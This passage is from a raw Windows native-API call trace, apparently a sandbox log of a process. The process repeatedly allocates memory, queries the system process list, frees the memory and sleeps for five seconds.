RegionSize=0xdea54*=0x20000) returned 0x0 [0259.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.753] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.859] 